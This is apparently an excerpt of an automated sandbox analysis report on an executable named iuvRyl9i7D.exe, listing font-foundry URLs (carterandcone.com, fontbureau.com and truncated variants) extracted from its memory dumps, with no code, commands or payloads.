Source: iuvRyl9i7D.exe, 00000000.00000003.247847880.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248188896.0000000005F04000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248440340.0000000005F0A000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248784254.0000000005F0A000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249091958.0000000005F0B000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247682105.0000000005F30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.com
Source: iuvRyl9i7D.exe, 00000000.00000003.248188896.0000000005F04000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248440340.0000000005F0A000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248784254.0000000005F0A000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249091958.0000000005F0B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.comadd
Source: iuvRyl9i7D.exe, 00000000.00000003.247918771.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248081116.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247847880.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248025845.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247762585.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247959832.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247722223.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247738889.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247797263.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247783561.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247944619.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247682105.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247751500.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247697909.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248000108.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247981605.0000000005F30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.comdd
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: iuvRyl9i7D.exe, 00000000.00000003.247847880.0000000005F30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.comn-u
Source: iuvRyl9i7D.exe, 00000000.00000003.251614077.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.257393537.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252077012.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250474688.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.258690878.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252113020.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251650593.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.257336256.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252154816.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.256890295.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251457232.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251042075.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250842535.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251521721.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251241602.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251088919.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251421233.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.256747694.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250772094.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251278974.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251544135.0000000005F30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
Source: iuvRyl9i7D.exe, 00000000.00000003.252787080.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252731012.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252813572.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252591924.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252619646.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252863483.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252648890.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252707963.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252670155.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252833388.0000000005F30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com.TTF
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: iuvRyl9i7D.exe, 00000000.00000003.250474688.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250459267.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/Z
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: iuvRyl9i7D.exe, 00000000.00000003.251295969.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251345771.0000000005F30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.htmlZ
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: iuvRyl9i7D.exe, 00000000.00000003.252486470.0000000005F30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersC
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: iuvRyl9i7D.exe, 00000000.00000003.250474688.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250510531.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250493202.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersV
Source: iuvRyl9i7D.exe, 00000000.00000003.251614077.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250474688.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251650593.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250566915.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250528449.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251457232.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251042075.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250842535.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251521721.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251241602.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251088919.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251421233.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250772094.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251278974.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251544135.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250632388.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251220537.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251756044.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250598952.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250706232.0000000005F33000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251002977.0000000005F30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com:
Source: iuvRyl9i7D.exe, 00000000.00000003.252113020.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253027717.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252787080.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252731012.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252154816.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252813572.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252591924.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252619646.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252863483.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252961013.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252486470.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252226605.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252559654.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252648890.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252354121.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252707963.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252193043.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252670155.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252384451.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252833388.0000000005F30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comF
Source: iuvRyl9i7D.exe, 00000000.00000003.257393537.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.258690878.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.257336256.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.256890295.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.256747694.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.258625946.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000002.300243537.0000000005F30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comF:
Source: iuvRyl9i7D.exe, 00000000.00000003.251899663.0000000005F30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comFU
Source: iuvRyl9i7D.exe, 00000000.00000003.252077012.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252113020.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253383810.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253027717.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253224001.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252787080.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252731012.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253128451.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252154816.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252813572.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253153122.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253083922.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253314080.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252591924.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253110391.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252619646.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252863483.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252961013.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252486470.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252226605.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253363848.0000000005F30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comI.TTF:
Source: iuvRyl9i7D.exe, 00000000.00000003.251042075.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250842535.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251241602.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251088919.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250772094.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251278974.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251220537.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251002977.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251295969.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250747109.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250726008.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comW.TTF
Source: iuvRyl9i7D.exe, 00000000.00000003.250474688.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250459267.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250510531.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250493202.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comalic
Source: iuvRyl9i7D.exe, 00000000.00000003.253027717.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252787080.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252731012.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252813572.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252591924.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252619646.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252863483.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252961013.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252486470.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252559654.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252648890.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253054220.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252707963.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252670155.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252833388.0000000005F30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comals(
Source: iuvRyl9i7D.exe, 00000000.00000003.251614077.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253027717.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251650593.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252787080.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252731012.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251457232.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252813572.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251042075.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250842535.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251521721.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251241602.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251088919.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251421233.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250772094.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251278974.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252591924.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251544135.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252619646.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251220537.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251756044.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252863483.0000000005F30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comd
Source: iuvRyl9i7D.exe, 00000000.00000003.251614077.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251650593.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251457232.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251521721.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251421233.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251544135.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251295969.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251345771.0000000005F30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comdo
Source: iuvRyl9i7D.exe, 00000000.00000003.257393537.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.258690878.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.257336256.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.256890295.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.256747694.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.258625946.0000000005F30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.come.comK
Source: iuvRyl9i7D.exe, 00000000.00000003.257393537.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.258690878.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.257336256.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.256890295.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.256747694.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.258625946.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.256684499.0000000005F30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comgrito
Source: iuvRyl9i7D.exe, 00000000.00000003.251899663.0000000005F30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comlic
Source: iuvRyl9i7D.exe, 00000000.00000003.251614077.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252077012.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252113020.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251650593.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252154816.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251960719.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251457232.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251042075.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252004043.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250842535.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251521721.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251241602.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251088919.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251421233.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250772094.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251278974.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251544135.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251220537.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251756044.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251002977.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251866854.0000000005F30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.commnF0$
Source: iuvRyl9i7D.exe, 00000000.00000003.252787080.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252731012.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252813572.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252591924.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252619646.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252863483.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252486470.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252559654.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252648890.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252707963.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252670155.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252833388.0000000005F30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.como
